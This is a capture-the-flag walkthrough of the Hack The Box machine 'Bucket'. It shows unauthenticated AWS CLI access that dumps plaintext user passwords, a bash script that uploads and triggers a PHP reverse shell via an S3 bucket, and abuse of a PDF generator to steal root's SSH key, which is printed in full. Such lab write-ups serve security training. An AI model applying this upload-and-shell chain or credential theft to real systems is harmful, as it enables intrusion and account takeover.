Introduction@Bucket:~$
Column | Details |
---|---|
Name | Bucket |
IP | 10.10.10.212 |
Points | 30 |
Os | Linux |
Difficulty | Medium |
Creator | MrR3boot |
Out On | 17 Oct 2020 |
Summary
-
Nmap
shows the 2 Ports open. -
Getting the
web server
- finding a directory called /shell
-
using aws cli to upload a
shell
-
And we get a
shell
-
grab
user.txt
-
we find a service running on a port
4566
-
port forward it and get a web server
code-execution
as root. -
Creating
alerts
table -
Insert
payload
. -
Trigger payload and create
pdf
file -
geeting
id_rsa
of root and then ssh in. - grab
root.txt
Pwned
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #cat nmap/result.nmap
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
So basically Two ports are opened 22:ssh
80:http
We find the sub-domain bucket.htb
in the nmap result Let's first add this in our /etc/hosts
file.
Port-80
There is a simple Bucket Advertising Platform
.
Let's view the source
code.
we see a new domain
let's add this in our hosts
file and go to that page.
It's says running
.
Let's use Gobuster
to find something new.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://s3.bucket.htb/
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/29 17:47:50 Starting gobuster
===============================================================
/health (Status: 200)
/shell (Status: 200)
We find a /shell
directory it's something new. let's check it out.
It's a DynamoDB Web Shell
and we also run command in that but i like to run the command in CLI
.
Let's configure our aws CLI
.
But First install the aws
CLI.
1
sudo apt-get install awscli
Now let's configure
it for our use.
1
2
3
4
5
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
Now our setup is complete. Let's list the table in the DynamoDB
Database.
1
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request
there is only one table users
.
Let's list the content in that.
1
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
We got some creads
I try this to get ssh
but nothing is working.
we find a web server on http://s3.bucket.htb
that says running
.
Let's try to enumerate
and list the Buckets
on that.
1
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request
There is one bucket called adserver
.
I think this bucket
connect to http://bucket.htb
page.
Let's list the content
in the adserver
bucket.
1
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
It's dump
all the files on the adserver bucket
.
Hmm.. Let's try to put our simple php-reverse
shell in that.
1
aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell.php
Let's list the file for double-check that our reverse shell
is available in the adserver
bucket or not.
1
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
Boom our shell.php
successfully insert inside the images
directory.
Let's do a curl
req to that directory and see our reverse
shell is working or not.
Important
: I use this method again so my shell name is shell1.php
in your case shell name is shell.php
And After running this command start your netcat
listner on port which you add
in your reverse shell
.
1
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
It's says 404
not found.
hmm i think it's a cronjob
think we need to be quick to get a reverse shell
.
I create a script
to automate curl
req let's use this.
1
2
3
4
5
while [[ $resp -eq 404 ]]; do
resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell1.php)
echo $resp
sleep 0.1;
done
I again do the same step
again but i didn't get the reverse
shell.
Let's create the automate
script to upload and execute it automatically
.
I wrote
a script to automate
the process.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
echo "List Files."
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
## Copy file to Bucket
aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell1.php
echo "Check if file is uploaded"
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
# Check if file exist
echo "Checking on s3.bucket"
# curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
resp=404
while [[ $resp -eq 404 ]]; do
resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell1.php)
echo $resp
sleep 0.1;
done
I name the script dedsec.sh
you choose your name as you wish
.
now the only work is to start your listner
and get a sweet
reverse shell.
Important : You run this script
two three times to get a reverse
shell.
Boom we got the reverse shell
.
Let's check the /etc/passwd
file to known about users in the machiene
.
there is a one user name roy
let's try the password which we find in bucket
.
Boom we get the user privilege
and get your user.txt
.
Privilege escalation
Before we start our Privilege escalation Let's do one think copy our ssh
public key in roy .ssh
folder so we got the ssh connection that's better than netcat
shell.
Now let's ssh
in and get our beautiful ssh connection.
After some enumeration
I find an interesting directory called bucket-app
.
Let's cat the index.php
and check what this file
do.
the index.php
shows another communcation to the internal
service, a new table name alerts
which is accessed with a post request with the values data
and create a pdf.
Link
: HTML to PDF converter for Java and .NET
We will abuse
this to get root id_rsa
file.
Step 1
First thing first we need to port
forward on port 8000
. Because aws
is installed in the system and an internal service port 8000
(web service) and port 4566
(aws service)
1
ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212
Let's crosscheck
that our port is forward
or not open your browser and type 127.0.0.1:8000
if it's show the web
server then your port is successfully
forwarded.
Step 2
create a new dynameDB
Table.
Use this command inside
the machiene.
1
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566
Step 3
create a table
and insert the values as requested by the index.php
.
Step 4
Now we only need to do a curl
req.
1
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
Step 5
Now open your browser
and go to 127.0.0.1:8000/files/
There is a result.pdf
open it.
Click on this pin
icon and download the id_rsa
of root.
But i want to download
it from my terminal so the file is organised in my bucket
directory.
1
2
chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.212
i will give you the id_rsa
of root that in case for the backup
plan.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Now the only step is missing
the root.txt
. Let's grab it.
And we pwned it …….
If u liked the writeup.Support a Student to Get the OSCP-Cert
Donation for OSCP
Resources
Topic | Url |
---|---|
HTML to PDF converter for Java and .NET | https://pd4ml.com/cookbook/pdf-attachments.htm |